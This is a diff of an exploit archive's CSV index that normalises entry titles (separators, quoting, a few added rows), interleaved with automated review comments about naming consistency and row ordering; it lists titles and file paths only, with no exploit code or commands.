22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
@ -3491,7 +3491,7 @@ id,file,description,date,author,platform,type,port
27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0
27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0
27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0
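Review bot: the new 27082 title turns "IMG and XML" into ".IMG / .XML", which presents both as file extensions although the old title did not, and it leaves them unquoted where other rows in this file quote extensions ('.m3u', '.png', '.iff'). Confirm against 27082.txt that these are file types; if they are, quote them as '.IMG' / '.XML' to match, otherwise drop the leading dots.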
@ -3910,7 +3910,7 @@ id,file,description,date,author,platform,type,port
30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0
30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0
33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0
@ -4325,7 +4325,7 @@ id,file,description,date,author,platform,type,port
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
@ -5216,7 +5216,7 @@ id,file,description,date,author,platform,type,port
40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0
40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0
@ -5365,7 +5365,7 @@ id,file,description,date,author,platform,type,port
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0
41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
@ -5419,7 +5419,7 @@ id,file,description,date,author,platform,type,port
41637,platforms/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos,0
41639,platforms/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos,0
41643,platforms/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos,0
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
41646,platforms/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
41647,platforms/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
41648,platforms/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
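Review bot: the new 41645 title keeps the doubled module prefix in "nt!nt!HvpGetBinMemAlloc". Since the row is being rewritten anyway, drop the extra "nt!" so the symbol reads nt!HvpGetBinMemAlloc. Both symbols in that title are also left unquoted, while the 41647 and 41648 rows in the same hunk quote theirs ('USP10!otlList::insertAt', 'USP10!AssignGlyphTypes'); quoting them here would match.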
@ -5506,7 +5506,7 @@ id,file,description,date,author,platform,type,port
42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0
42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0
42017,platforms/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos,0
42018,platforms/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos,0
@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
42970,platforms/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos,0
42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
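Review bot: the 42970 row (binutils 'read_1_byte') sits between 42955 and 42962, so the ids at the end of the dos block run 42955, 42970, 42962, 42969. If rows are meant to stay in ascending id order within a type, move 42970 after 42969, directly before the first local row (id 3). If placement follows some other key, a short note in the commit message would help, because nothing in the row itself explains the position.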
@ -5794,9 +5795,9 @@ id,file,description,date,author,platform,type,port
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0
320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0
321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0
325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0
330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0
331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0
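Review bot: after the rename, 321 and 325 both carry a "BSD / Linux - ..." title, but 321 is filed under platforms/multiple with platform multiple while 325 stays under platforms/linux with platform linux. Anyone filtering on the platform column will miss 325 for BSD. Either align the platform field of 325 with its title in a follow-up, or narrow the title to what the entry actually covers.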
@ -5880,7 +5881,7 @@ id,file,description,date,author,platform,type,port
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0
803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0
811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0
816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0
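Review bot: the 798 rename goes the opposite way from the rest of this commit. Elsewhere "X and Y" becomes "X / Y" and field names gain quotes (19407 becomes 'Login' / 'Password'), but here the quotes around 'Username' are removed and "and" is kept; 19922 is changed the same way. Pick one convention for credential field names, either "Username / Password" or quoted 'Username' / 'Password', and apply it to 798, 19922 and 19407 alike so a title search on the quoted form does not return only part of the set.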
@ -8594,7 +8595,7 @@ id,file,description,date,author,platform,type,port
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
@ -8643,7 +8644,7 @@ id,file,description,date,author,platform,type,port
35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
@ -9284,7 +9285,8 @@ id,file,description,date,author,platform,type,port
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
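Review bot: the two ASX to MP3 rows name the same product differently. 42963 uses "ASX to MP3 converter < 3.1.3.7" and the new 42974 uses "ASX to MP3 3.1.3.7", so a title search on either spelling misses the other, and the version field reads as a range in one row and a single version in the other. Use one product string for both, and confirm whether 42974 is meant to be "< 3.1.3.7" or exactly 3.1.3.7.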
@ -9600,7 +9602,7 @@ id,file,description,date,author,platform,type,port
969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21
970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164
975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow",2005-05-01,muts,windows,remote,21
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote,0
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
@ -10915,7 +10917,7 @@ id,file,description,date,author,platform,type,port
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
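Review bot: the 15352 rename does more than normalise the separator, it also drops the "(From the Wild)" suffix. That tag is the only place the row records that the sample was captured in the wild rather than written as a PoC, which is useful context for anyone triaging by title. Keep the suffix in the new title, or call out the removal in the commit message if it is deliberate.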
@ -11212,7 +11214,7 @@ id,file,description,date,author,platform,type,port
16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow (MS06-067) (Metasploit)",2010-07-16,Metasploit,windows,remote,0
16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow (MS08-070) (Metasploit)",2010-11-24,Metasploit,windows,remote,0
16508,platforms/windows/remote/16508.rb,"Novell iPrint Client - ActiveX Control Buffer Overflow (Metasploit)",2008-06-16,Metasploit,windows,remote,0
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)",2011-02-22,Metasploit,windows,remote,0
16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager - Stack Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16511,platforms/windows/remote/16511.rb,"Logitech VideoCall - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj - ActiveX Control Arbitrary File Download and Execute (Metasploit)",2010-11-24,Metasploit,windows,remote,0
@ -11766,7 +11768,7 @@ id,file,description,date,author,platform,type,port
18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - 'vncviewer.exe' Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree and SimpleTree Classes",2012-03-28,rgod,windows,remote,0
18672,platforms/windows/remote/18672.txt,"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes",2012-03-28,rgod,windows,remote,0
18673,platforms/hardware/remote/18673.txt,"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow",2012-03-28,rgod,hardware,remote,0
